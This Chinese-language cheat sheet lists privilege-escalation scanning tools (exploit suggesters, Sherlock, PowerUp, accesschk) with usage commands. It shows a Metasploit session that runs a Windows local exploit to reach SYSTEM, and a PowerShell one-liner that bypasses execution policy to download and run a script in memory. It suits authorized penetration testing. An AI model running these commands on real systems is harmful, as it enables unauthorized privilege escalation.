提权扫描工具一览

使用Windows-Exploit-Suggester解析systeminfo

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

1
./windows-exploit-suggester.py

使用Linux-Exploit-Suggester.sh寻找linux提权问题

https://github.com/mzet-/linux-exploit-suggester

1
./linux-exploit-suggester.sh

使用Sherlock

https://github.com/rasta-mouse/Sherlock

1
2
Import-Module Sherlock.ps1
Find-AllVulns

使用msf查询补丁和可利用提权漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 查询补丁
meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

# 查询Exp
msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

# 利用示例
msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

使用powerup检查提权漏洞

1
2
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改

1
2
3
4
5
6
7
8
9
10
11
12
13
14
accesschk "d:\dir"
查看所有用户在ddir路径的子路径的权限

accesschk "Administrator "d:\dir"
查看Administrator用户在ddir路径的子路径的权限

accesschk Administrators -c *
查看Administrators组对所有服务的权限

accesschk -k Guest hklm\software
查看Guest用户对hklm\software注册表的权限

accesschk -ou User
查看User用户对全局对象的权限